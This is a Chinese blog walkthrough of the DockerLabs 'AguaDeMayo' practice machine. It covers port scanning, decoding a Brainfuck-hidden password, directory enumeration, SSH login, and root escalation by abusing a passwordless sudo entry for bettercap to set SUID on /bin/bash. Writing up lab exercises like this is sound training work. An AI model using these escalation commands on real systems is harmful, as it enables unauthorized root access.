Pepster'Blog
[DockerLabs]AguaDeMayo详解WP
城南花已开 Lv5
  2024-12-09 21:33:50   2025-01-22 19:49:12    1.4k 字  7 分钟  

信息收集

服务探测

在此之前,靶机部署花了我好长时间,由于我docker是在WSL里面的Ubuntu装的,同时我的WSL设置Network又是mirror就导致我kali无法正常访问Ubuntu中的docker容器,我利用靶机自带的自动部署脚本一键部署,不知道是不是脚本并未设置容器启动时的端口映射

我的KaliUbuntu都是跑在WSL中的,当设置网络为mirror时,虽然ip可以和宿主机的windwos一致,但是在WSL中开放的docker 出的虚拟网卡,windows是不能访问到的,而Kali虽然可以ping通Ubuntu创建的docker虚拟网卡,也能使用nmap正常扫描,但是扫出的80端口就是curl不了

以至于后面换了Nat可以正常curl了

也就是说无论你是mirror还是Nat模式,WSL下的IP都是共享的,都是同一个IP,至于windows能否访问我试了很多方法也都不起作用

其实这个靶机是很easy的,只不过WSL坑太大了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
❯ rustscan -a 172.17.0.2
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Making networking exciting since... whenever.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 172.17.0.2:22
Open 172.17.0.2:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 21:46 CST
Initiating ARP Ping Scan at 21:46
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 21:46, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:46
Completed Parallel DNS resolution of 1 host. at 21:46, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:46
Scanning 172.17.0.2 [2 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 21:46, 0.03s elapsed (2 total ports)
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000029s latency).
Scanned at 2024-12-09 21:46:45 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 02:42:AC:11:00:02 (Unknown)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

可以看到开放的80端口

尝试curl一下,注释中藏着一个类似编码后的文本,一眼Brainfuck编码

1
2
3
<!--
++++++++++[>++++++++++>++++++++++>++++++++++>++++++++++>++++++++++>++++++++++>++++++++++++>++++++++++>+++++++++++>++++++++++++>++++++++++>++++++++++++>++++++++++>+++++++++++>+++++++++++>+>+<<<<<<<<<<<<<<<<<-]>--.>+.>--.>+.>---.>+++.>---.>---.>+++.>---.>+..>-----..>---.>.>+.>+++.>.
-->

解码后得到bebeaguaqueessano

那尝试扫一下目录看看有没有收获

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
❯ gobuster dir -u 172.17.0.2 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/images               (Status: 301) [Size: 309] [--> http://172.17.0.2/images/]
/index.html           (Status: 200) [Size: 11142]
/server-status        (Status: 403) [Size: 275]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

有个images的文件夹得到一张名为agua_ssh.jpg图片

image

很明显其实已经给了提示了

我们尝试使用agua这个用户名来ssh连上docker容器,密码就是之前解码得到的

用户提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ ssh [email protected]
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:EZNhR2ojYOvInwAg+dpLntRab/b7eRvr60vq3sn7hH8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux 5ed94ec8c875 5.15.167.4-microsoft-standard-WSL2 #1 SMP Tue Nov 5 00:21:55 UTC 2024 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 14 17:41:58 2024 from 172.17.0.1
agua@5ed94ec8c875:~$

成功进入,不是⁉️我也妹想到这么简单就上了,可能这个靶场就是偏easy的吧

Root提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
agua@5ed94ec8c875:~$ id
uid=1000(agua) gid=1000(agua) groups=1000(agua),104(lxd)
agua@5ed94ec8c875:~$ sudo -l
Matching Defaults entries for agua on 5ed94ec8c875:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User agua may run the following commands on 5ed94ec8c875:
    (root) NOPASSWD: /usr/bin/bettercap
agua@5ed94ec8c875:~$ sudo /usr/bin/bettercap
bettercap v2.32.0 (built for linux amd64 with go1.19.8) [type 'help' for a list of commands]

172.17.0.0/16 > 172.17.0.2  » [14:03:50] [sys.log] [war] exec: "ip": executable file not found in $PATH
172.17.0.0/16 > 172.17.0.2  » help

           help MODULE : List available commands or show module specific help if no module name is provided.
                active : Show information about active modules.
                  quit : Close the session and exit.
         sleep SECONDS : Sleep for the given amount of seconds.
              get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
        set NAME VALUE : Set the VALUE of variable NAME.
  read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
                 clear : Clear the screen.
        include CAPLET : Load and run this caplet in the current session.
             ! COMMAND : Execute a shell command and print its output.
        alias MAC NAME : Assign an alias to a given endpoint given its MAC address.

发现有个sudo权限,可以利用bettercap这个程序,然而这个程序可以利用! COMMAND来执行bash命令

1
2
3
172.17.0.0/16 > 172.17.0.2  » ! chmod +s /bin/bash
172.17.0.0/16 > 172.17.0.2  » quit
open /proc/sys/net/ipv4/ip_forward: read-only file system

给bash赋予SUID权限,退出后bash -p就完事了

1
2
3
agua@5ed94ec8c875:~$ bash -p
bash-5.2# whoami
root

我找了一圈了,也没发现有flag啊,难道拿到root后就结束了⁉️⁉️

  1. 信息收集
    1. 服务探测
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
  2. 用户提权
  3. Root提权